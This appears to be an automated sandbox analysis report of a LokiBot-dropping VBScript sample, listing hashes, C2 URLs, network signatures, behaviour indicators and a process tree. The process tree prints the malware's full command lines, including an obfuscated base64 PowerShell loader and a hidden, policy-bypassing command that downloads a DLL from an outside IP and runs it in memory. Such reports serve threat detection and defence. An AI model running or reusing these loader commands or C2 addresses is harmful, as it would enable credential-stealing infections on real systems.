Analysis
- max time kernel: 137s
- max time network: 145s
- platform: windows10-2004_x64
- resource: win10v2004-20220722-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20220722-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 25-07-2022 08:52
- Static task: static1
- Behavioral task: behavioral1
- Sample: ORDINE.vbs
- Resource: win7-20220715-en
General
- Target: ORDINE.vbs
- Size: 231KB
- MD5: e020cd23ba91c3f6ad9c9ed3d6f391b5
- SHA1: c924b29e61a4765cee969e841a76e304b646c168
- SHA256: d985cfc667c76c46662c1de784d8d8844af661f9fe421ab9f0a4f8d704002738
- SHA512: 6f01979834b8de6979bb485edaff44079ca58923b2e333e6e089ef76f73b13e6b5c51d2220163c0a216bc1f5576be4c0fc30867743e7f1ef70054868b083ff86
Malware Config
Extracted (payload URL):
- http://20.7.14.99/dll/14-07-2022.mp4
Extracted (lokibot):
- http://vlascx.xyz/luck/cx/kai.php
- http://kbfvzoboss.bid/alien/fre.php
- http://alphastand.trade/alien/fre.php
- http://alphastand.win/alien/fre.php
- http://alphastand.top/alien/fre.php
Signatures
- suricata: ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1
- suricata: ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M2
- suricata: ET MALWARE LokiBot Checkin
- suricata: ET MALWARE LokiBot Fake 404 Response
- suricata: ET MALWARE LokiBot Request for C2 Commands Detected M1
- suricata: ET MALWARE LokiBot Request for C2 Commands Detected M2
- suricata: ET MALWARE LokiBot User-Agent (Charon/Inferno)
- suricata: ET MALWARE Powershell commands sent B64 3
Blocklisted process makes network request (2 IoCs)
Processes: powershell.exe
  flow | pid  | process
  1    | 2180 | powershell.exe
  2    | 2180 | powershell.exe

Checks computer location settings (2 TTPs, 1 IoC)
Looks up country code configured in the registry, likely geofence.
Processes: WScript.exe
  description       | ioc                                                                                              | process
  Key value queried | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000\Control Panel\International\Geo\Nation | WScript.exe

Drops startup file (1 IoC)
Processes: powershell.exe
  description  | ioc                                                                                         | process
  File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\notepad.lnk | powershell.exe

Accesses Microsoft Outlook profiles (1 TTP, 3 IoCs)
Processes: cvtres.exe
  description | ioc                                                                                                                              | process
  Key opened  | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook                 | cvtres.exe
  Key opened  | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook                 | cvtres.exe
  Key opened  | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | cvtres.exe

Suspicious use of SetThreadContext (1 IoC)
Processes: powershell.exe
  description                        | pid  | process        | target process
  PID 2180 set thread context of 3196 | 2180 | powershell.exe | cvtres.exe

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Suspicious behavior: EnumeratesProcesses (6 IoCs)
Processes: powershell.exe, powershell.exe, powershell.exe
  pid  | process
  1056 | powershell.exe
  1056 | powershell.exe
  2180 | powershell.exe
  2180 | powershell.exe
  536  | powershell.exe
  536  | powershell.exe

Suspicious use of AdjustPrivilegeToken (4 IoCs)
Processes: powershell.exe, powershell.exe, powershell.exe, cvtres.exe
  description             | pid  | process
  Token: SeDebugPrivilege | 1056 | powershell.exe
  Token: SeDebugPrivilege | 2180 | powershell.exe
  Token: SeDebugPrivilege | 536  | powershell.exe
  Token: SeDebugPrivilege | 3196 | cvtres.exe

Suspicious use of WriteProcessMemory (15 IoCs)
Processes: WScript.exe, powershell.exe, powershell.exe
  description                      | pid  | process        | target process
  PID 804 wrote to memory of 1056  | 804  | WScript.exe    | powershell.exe
  PID 804 wrote to memory of 1056  | 804  | WScript.exe    | powershell.exe
  PID 1056 wrote to memory of 2180 | 1056 | powershell.exe | powershell.exe
  PID 1056 wrote to memory of 2180 | 1056 | powershell.exe | powershell.exe
  PID 2180 wrote to memory of 536  | 2180 | powershell.exe | powershell.exe
  PID 2180 wrote to memory of 536  | 2180 | powershell.exe | powershell.exe
  PID 2180 wrote to memory of 3196 | 2180 | powershell.exe | cvtres.exe
  PID 2180 wrote to memory of 3196 | 2180 | powershell.exe | cvtres.exe
  PID 2180 wrote to memory of 3196 | 2180 | powershell.exe | cvtres.exe
  PID 2180 wrote to memory of 3196 | 2180 | powershell.exe | cvtres.exe
  PID 2180 wrote to memory of 3196 | 2180 | powershell.exe | cvtres.exe
  PID 2180 wrote to memory of 3196 | 2180 | powershell.exe | cvtres.exe
  PID 2180 wrote to memory of 3196 | 2180 | powershell.exe | cvtres.exe
  PID 2180 wrote to memory of 3196 | 2180 | powershell.exe | cvtres.exe
  PID 2180 wrote to memory of 3196 | 2180 | powershell.exe | cvtres.exe

outlook_office_path (1 IoC)
Processes: cvtres.exe
  description | ioc                                                                                                              | process
  Key opened  | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | cvtres.exe

outlook_win_path (1 IoC)
Processes: cvtres.exe
  description | ioc                                                                                                                              | process
  Key opened  | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | cvtres.exe
Processes (process tree; the leading number is the nesting depth)

1. C:\Windows\System32\WScript.exe
   Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ORDINE.vbs"
   - Checks computer location settings
   - Suspicious use of WriteProcessMemory

   2. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'WwBC⁂Hk⁂d⁂Bl⁂Fs⁂XQBd⁂C⁂⁂J⁂BE⁂Ew⁂T⁂⁂g⁂D0⁂I⁂Bb⁂FM⁂eQBz⁂HQ⁂ZQBt⁂C4⁂QwBv⁂G4⁂dgBl⁂HI⁂d⁂Bd⁂Do⁂OgBG⁂HI⁂bwBt⁂EI⁂YQBz⁂GU⁂Ng⁂0⁂FM⁂d⁂By⁂Gk⁂bgBn⁂Cg⁂K⁂BO⁂GU⁂dw⁂t⁂E8⁂YgBq⁂GU⁂YwB0⁂C⁂⁂TgBl⁂HQ⁂LgBX⁂GU⁂YgBD⁂Gw⁂aQBl⁂G4⁂d⁂⁂p⁂C4⁂R⁂Bv⁂Hc⁂bgBs⁂G8⁂YQBk⁂FM⁂d⁂By⁂Gk⁂bgBn⁂Cg⁂JwBo⁂HQ⁂d⁂Bw⁂Do⁂Lw⁂v⁂DI⁂M⁂⁂u⁂Dc⁂Lg⁂x⁂DQ⁂Lg⁂5⁂Dk⁂LwBk⁂Gw⁂b⁂⁂v⁂DE⁂N⁂⁂t⁂D⁂⁂Nw⁂t⁂DI⁂M⁂⁂y⁂DI⁂LgBt⁂H⁂⁂N⁂⁂n⁂Ck⁂KQ⁂7⁂Fs⁂UwB5⁂HM⁂d⁂Bl⁂G0⁂LgBB⁂H⁂⁂c⁂BE⁂G8⁂bQBh⁂Gk⁂bgBd⁂Do⁂OgBD⁂HU⁂cgBy⁂GU⁂bgB0⁂EQ⁂bwBt⁂GE⁂aQBu⁂C4⁂T⁂Bv⁂GE⁂Z⁂⁂o⁂CQ⁂R⁂BM⁂Ew⁂KQ⁂u⁂Ec⁂ZQB0⁂FQ⁂eQBw⁂GU⁂K⁂⁂n⁂HY⁂5wBJ⁂Fc⁂TwBl⁂EI⁂U⁂BM⁂Eo⁂VQDH⁂Gg⁂dwB4⁂C4⁂Z⁂BV⁂HU⁂c⁂Bq⁂FU⁂TQBn⁂GM⁂ZQBR⁂FU⁂xwBQ⁂G4⁂Jw⁂p⁂C4⁂RwBl⁂HQ⁂TQBl⁂HQ⁂a⁂Bv⁂GQ⁂K⁂⁂n⁂Ew⁂T⁂Bw⁂Fc⁂VwBx⁂E8⁂a⁂BI⁂Fg⁂Jw⁂p⁂C4⁂SQBu⁂HY⁂bwBr⁂GU⁂K⁂⁂k⁂G4⁂dQBs⁂Gw⁂L⁂⁂g⁂Fs⁂bwBi⁂Go⁂ZQBj⁂HQ⁂WwBd⁂F0⁂I⁂⁂o⁂Cc⁂d⁂B4⁂HQ⁂LgB3⁂G8⁂bgBr⁂C8⁂Ng⁂y⁂DI⁂Lg⁂2⁂DQ⁂Mg⁂u⁂DI⁂OQ⁂x⁂C4⁂Mg⁂x⁂DI⁂Lw⁂v⁂Do⁂c⁂B0⁂HQ⁂a⁂⁂n⁂Ck⁂KQ⁂=';$OWjuxD = [System.Text.encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('⁂','A') ) );powershell.exe -windowstyle hidden -executionPolicy Bypss -NoProfile -Command $OWjuxD
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

      3. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
         Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.7.14.99/dll/14-07-2022.mp4'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('vçIWOeBPLJUÇhwx.dUupjUMgceQUÇPn').GetMethod('LLpWWqOhHX').Invoke($null, [object[]] ('txt.wonk/622.642.291.212//:ptth'))"
         - Blocklisted process makes network request
         - Drops startup file
         - Suspicious use of SetThreadContext
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of AdjustPrivilegeToken
         - Suspicious use of WriteProcessMemory

         4. C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe
            Command line: "C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\Done.vbs
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken

         4. C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
            Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"
            - Accesses Microsoft Outlook profiles
            - Suspicious use of AdjustPrivilegeToken
            - outlook_office_path
            - outlook_win_path
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  Filesize: 2KB
  MD5: 6cf293cb4d80be23433eecf74ddb5503
  SHA1: 24fe4752df102c2ef492954d6b046cb5512ad408
  SHA256: b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
  SHA512: 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 1KB
  MD5: 3de5056547a2b5039ab8b93b4a224b2e
  SHA1: 47067a14fe0854189f90d6b9609bd51666ca0dbb
  SHA256: 22f7d2a696927163d7fa467aa3289060a17e521b4184bfd13e808ef4195ed59a
  SHA512: 1527f92d0820a23696fa05d67ec19bb7be2aac3f0a745dbf1d4d7ae4c7b228d2f477ed95b79141eb43013f8ce67dc8a5c23a72bd08f0e510a6ff99e7fff98520
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 64B
  MD5: 235a8eb126d835efb2e253459ab8b089
  SHA1: 293fbf68e6726a5a230c3a42624c01899e35a89f
  SHA256: 5ffd4a816ae5d1c1a8bdc51d2872b7dd99e9c383c88001d303a6f64a77773686
  SHA512: a83d17203b581491e47d65131e1efc8060ff04d1852e3415fc0a341c6a9691ef9f4cf4dd29d2f6d0032a49f2ba4bd36c35b3f472f0ce5f78f4bb139124760e92
Memory dumps
- memory/536-137-0x0000000000000000-mapping.dmp
- memory/536-138-0x00007FFE97C40000-0x00007FFE98701000-memory.dmp
  Filesize: 10.8MB
- memory/536-139-0x00007FFE97C40000-0x00007FFE98701000-memory.dmp
  Filesize: 10.8MB
- memory/1056-133-0x000001C2E0830000-0x000001C2E0852000-memory.dmp
  Filesize: 136KB
- memory/1056-146-0x00007FFE97C40000-0x00007FFE98701000-memory.dmp
  Filesize: 10.8MB
- memory/1056-135-0x00007FFE97C40000-0x00007FFE98701000-memory.dmp
  Filesize: 10.8MB
- memory/1056-132-0x0000000000000000-mapping.dmp
- memory/2180-144-0x00007FFE97C40000-0x00007FFE98701000-memory.dmp
  Filesize: 10.8MB
- memory/2180-136-0x00007FFE97C40000-0x00007FFE98701000-memory.dmp
  Filesize: 10.8MB
- memory/2180-134-0x0000000000000000-mapping.dmp
- memory/3196-141-0x00000000004139DE-mapping.dmp
- memory/3196-140-0x0000000000400000-0x00000000004A2000-memory.dmp
  Filesize: 648KB
- memory/3196-148-0x0000000000400000-0x00000000004A2000-memory.dmp
  Filesize: 648KB
- memory/3196-149-0x0000000000400000-0x00000000004A2000-memory.dmp
  Filesize: 648KB
- memory/3196-150-0x0000000000400000-0x00000000004A2000-memory.dmp
  Filesize: 648KB